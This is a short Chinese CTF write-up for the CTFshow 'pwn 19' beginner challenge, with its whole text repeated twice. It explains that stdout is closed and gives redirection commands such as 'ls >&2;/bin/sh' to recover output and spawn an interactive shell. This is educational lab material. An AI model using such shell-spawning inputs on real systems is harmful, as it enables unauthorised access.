CTFshow Pwn入门 - pwn 19
先看main函数:
fclose(_bss_start) = fclose(stdout) 关闭了默认fd=1的输出,所以system的结果无法直接看到。
思路:
输出重定向。
ls 1>&0
ls >&0
ls >&2 ###三种写法均可
将输出重定向到能回显的终端并获得一个新的交互式shell:
ls >&2;/bin/sh
先看main函数:
fclose(_bss_start) = fclose(stdout) 关闭了默认fd=1的输出,所以system的结果无法直接看到。
思路:
输出重定向。
ls 1>&0
ls >&0
ls >&2 ###三种写法均可
将输出重定向到能回显的终端并获得一个新的交互式shell:
ls >&2;/bin/sh